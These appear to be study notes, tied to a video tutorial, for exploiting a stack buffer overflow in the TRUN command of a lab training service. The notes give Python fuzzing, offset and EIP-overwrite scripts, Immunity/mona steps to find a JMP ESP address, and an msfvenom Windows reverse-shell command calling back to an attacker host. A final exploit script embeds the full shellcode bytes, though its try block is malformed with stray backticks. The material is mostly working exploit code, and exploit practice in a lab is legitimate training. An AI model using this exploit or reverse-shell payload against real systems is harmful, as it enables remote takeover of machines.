https://www.youtube.com/watch?v=GqwyonqLYdQ
Spiking
*generic_send_tcp 10.10.20.13 9999 trun.spk 0 0
trun.spk
s_readline();
s_string("TRUN ");
s_string_variable("0");
Fuzzing
fuzz.py
#!/usr/bin/python
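import sys
import socket
from time import sleep

# Send an ever-growing run of "A"s to the TRUN command, 100 bytes more each
# round, until the service stops accepting connections. The length printed on
# failure is the size that was being sent when the service went away; that is
# the region the pattern_create step later searches for the exact offset.
buf = "A" * 100
while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect(('10.10.20.13', 9999))
            s.send('TRUN /.:/' + buf)
        finally:
            # Close even when connect()/send() raises; the original only
            # closed on the success path and leaked the socket otherwise.
            s.close()
        sleep(1)
        buf = buf + "A" * 100
    except socket.error:
        # Only a socket failure means the service is gone. A bare except also
        # caught KeyboardInterrupt and reported a crash that never happened.
        print("Fuzzing crashed at %s bytes" % len(buf))
        sys.exit()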
* Collect the breakpoint (the crash) in the debugger
Find offset
*/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 6000
offset.py
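#!/usr/bin/python
import sys
import socket

# Paste the 6000-byte pattern_create.rb output here. The EIP value recorded in
# the debugger after the crash is then passed to pattern_offset.rb to find
# how many bytes precede the saved return address.
offset = "pattern_create_output"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect(('10.10.20.13', 9999))
        s.send('TRUN /.:/' + offset)
    finally:
        # Always release the socket, not only on the success path.
        s.close()
except socket.error:
    # Catch socket failures only; a bare except also swallowed Ctrl-C.
    print("Error connecting to server")
    sys.exit()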
- Collect the EIP value from Immunity Debugger
Find Offset
- /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 6000 -q EIP-Value
Overwrite EIP
eipwrite.py
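#!/usr/bin/python
import sys
import socket

# 2003 = the pattern_offset value: bytes of padding before EIP is reached.
# The four "B"s (0x42) land in EIP, which is what the debugger check below
# looks for.
shellcode = "A" * 2003 + "B" * 4
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect(('10.10.20.13', 9999))
        s.send('TRUN /.:/' + shellcode)
    finally:
        # Always release the socket, not only on the success path.
        s.close()
except socket.error:
    # Catch socket failures only; a bare except also swallowed Ctrl-C.
    print("Error connecting to server")
    sys.exit()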
- Check in Immunity that EIP reads 42424242 (the four "B" bytes)
Check bad characters
- run badchars.py
- In Immunity, follow ESP in the dump (Follow in Dump)
- Check that after 42424242 no bad characters are found
- The bytes 01 to FF should appear in order; if B0 or any other value is missing or altered, it is a bad character
- If not, write down the locations of all bad characters
Find right module
Check for memory protection
- Open Immunity
- run !mona modules
- look for a DLL whose protection columns are all set to False
- run !mona find -s "\xff\xe4" -m essfunc.dll (\xff\xe4 is the JMP ESP opcode; this checks the module for usable jumps)
- copy RETURN ADDR 625011AF
Check EIP overwrite with JMP info
- open Immunity, click the black arrow (go to address) and enter the JMP address 625011af
- set a breakpoint on that instruction
*run writemodule.py
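#!/usr/bin/python
import sys
import socket

# 625011af: the JMP address found with !mona find in essfunc.dll, written
# byte-reversed (little-endian) so it lands in EIP as 625011af.
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect(('10.10.20.13', 9999))
        s.send('TRUN /.:/' + shellcode)
    finally:
        # Always release the socket, not only on the success path.
        s.close()
except socket.error:
    # Catch socket failures only; a bare except also swallowed Ctrl-C.
    print("Error connecting to server")
    sys.exit()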
- go back to Immunity and check that EIP shows the JMP address and resolves to the DLL (essfunc.625011af in this example)
Generate shellcode
- msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.11 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00" (the -b list is the bad characters found in the previous step)
- copy the output into overflow.py
#!/usr/bin/python
import sys, socket
# msfvenom windows/shell_reverse_tcp output (command listed above), generated
# with -b "\x00" so the null byte never appears in the payload. Regenerate it
# if LHOST/LPORT or the bad-character list changes.
overflow = (
"\xba\xb9\x52\x1f\x1a\xd9\xc2\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x31\x50\x12\x03\x50\x12\x83\x79\x56\xfd\xef\x85\xbf\x83"
"\x10\x75\x40\xe4\x99\x90\x71\x24\xfd\xd1\x22\x94\x75\xb7\xce"
"\x5f\xdb\x23\x44\x2d\xf4\x44\xed\x98\x22\x6b\xee\xb1\x17\xea"
"\x6c\xc8\x4b\xcc\x4d\x03\x9e\x0d\x89\x7e\x53\x5f\x42\xf4\xc6"
"\x4f\xe7\x40\xdb\xe4\xbb\x45\x5b\x19\x0b\x67\x4a\x8c\x07\x3e"
"\x4c\x2f\xcb\x4a\xc5\x37\x08\x76\x9f\xcc\xfa\x0c\x1e\x04\x33"
"\xec\x8d\x69\xfb\x1f\xcf\xae\x3c\xc0\xba\xc6\x3e\x7d\xbd\x1d"
"\x3c\x59\x48\x85\xe6\x2a\xea\x61\x16\xfe\x6d\xe2\x14\x4b\xf9"
"\xac\x38\x4a\x2e\xc7\x45\xc7\xd1\x07\xcc\x93\xf5\x83\x94\x40"
"\x97\x92\x70\x26\xa8\xc4\xda\x97\x0c\x8f\xf7\xcc\x3c\xd2\x9f"
"\x21\x0d\xec\x5f\x2e\x06\x9f\x6d\xf1\xbc\x37\xde\x7a\x1b\xc0"
"\x21\x51\xdb\x5e\xdc\x5a\x1c\x77\x1b\x0e\x4c\xef\x8a\x2f\x07"
"\xef\x33\xfa\x88\xbf\x9b\x55\x69\x6f\x5c\x06\x01\x65\x53\x79"
"\x31\x86\xb9\x12\xd8\x7d\x2a\x17\x17\x69\xa1\x4f\x25\x91\xa4"
"\xd3\xa0\x77\xac\xfb\xe4\x20\x59\x65\xad\xba\xf8\x6a\x7b\xc7"
"\x3b\xe0\x88\x38\xf5\x01\xe4\x2a\x62\xe2\xb3\x10\x25\xfd\x69"
"\x3c\xa9\x6c\xf6\xbc\xa4\x8c\xa1\xeb\xe1\x63\xb8\x79\x1c\xdd"
"\x12\x9f\xdd\xbb\x5d\x1b\x3a\x78\x63\xa2\xcf\xc4\x47\xb4\x09"
"\xc4\xc3\xe0\xc5\x93\x9d\x5e\xa0\x4d\x6c\x08\x7a\x21\x26\xdc"
"\xfb\x09\xf9\x9a\x03\x44\x8f\x42\xb5\x31\xd6\x7d\x7a\xd6\xde"
"\x06\x66\x46\x20\xdd\x22\x66\xc3\xf7\x5e\x0f\x5a\x92\xe2\x52"
"\x5d\x49\x20\x6b\xde\x7b\xd9\x88\xfe\x0e\xdc\xd5\xb8\xe3\xac"
"\x46\x2d\x03\x02\x66\x64")
# Layout: 2003 bytes of padding up to the EIP offset (pattern_offset value),
# the JMP address 625011af written little-endian, a 32-byte NOP (\x90) sled,
# then the msfvenom payload above.
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.20.13',9999))
`s.send(('TRUN /.:/' + shellcode))`
`s.close()`